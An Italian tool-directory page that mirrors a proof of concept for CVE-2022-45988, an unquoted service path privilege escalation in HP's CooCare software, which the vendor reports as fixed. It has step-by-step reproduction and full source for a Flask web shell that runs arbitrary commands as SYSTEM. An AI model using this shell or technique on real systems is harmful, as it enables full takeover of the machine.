Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-45988 — CVE-2022-45988 StarSoftComm HP CooCare Esiste una vulnerabilità di elevazione dei privilegi | Kitploit
Strumenti/GitHubGitHub/happy0717/cve-2022-45988
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare Esiste una vulnerabilità di elevazione dei privilegi

Vedi Repository
33 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-45988 StarSoftComm HP CooCare Esiste una vulnerabilità di elevazione dei privilegi

####################################################

Ho contattato hp-security-alert: hanno corretto questo bug. Riguardo a StarSoftComm CooCare [HP-PSRT-IR #4106] image Il fornitore ha risposto con le seguenti informazioni:

Segui questi passaggi per aggiornare:

  1. Avvia eService
  2. Aspetta circa 3 minuti
  3. Chiudi e avvia di nuovo eService.
  4. Controlla che la versione sia v5.364 o successiva.

#####################################

Esiste una vulnerabilità di elevazione dei privilegi in StarSoftComm HP CooCare che potrebbe consentire a un attaccante di elevare il proprio livello di privilegi. e管家超级版 è un software di diagnostica remota preinstallato su HP星14 pro; è un prodotto di StarSoftComm (软通科技).

testato su Windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 laptop da 14 pollici 14-eh0000 (56D77AV)

Versione interessata: CooCare precedente alla v5.364

#Riproduzione della vulnerabilità

#Il primo passo:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ trova il servizio (usa il comando CMD sopra per trovare il servizio non quotato)

image

Il nome del servizio è Windows Application Management Service = AKA = WinAppMgmt
Il nome del servizio è Windows Application Management Service, in breve WinAppMgmt.

image

Il servizio proviene da StarSoftComm CooCare

image

#Passo 2:Prepara un programma dannoso

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

Stavo usando python3 flask per scrivere un exe dannoso. Può ascoltare sulla porta HTTP 14145 ed eseguire comandi di sistema.

Usando il comando pyinstaller.exe --onefile --windowed -F -w python_test.py si crea un exe dannoso.

#Passo 3:Metti il malware nel percorso C:\ e rinomina il malware in Program.exe

image

#Passo 4:Avvia il servizio Windows Application Management

Se il servizio Windows Application Management è già avviato, puoi riavviarlo

image

#Passo 5:Attendi l'avvio del servizio Windows Application Management ed esegui i comandi di sistema C:\Program.exe viene eseguito come SYSTEM.

Quando vedo che Windows Application Management Service risulta avviato in Taskmgr.exe come SYSTEM, posso aprire il browser e inserire http://127.0.0.1:14145?cmd=whoami

Aspetta..........

per...

questo.

NT SYSTEM

image

Scarica lo strumento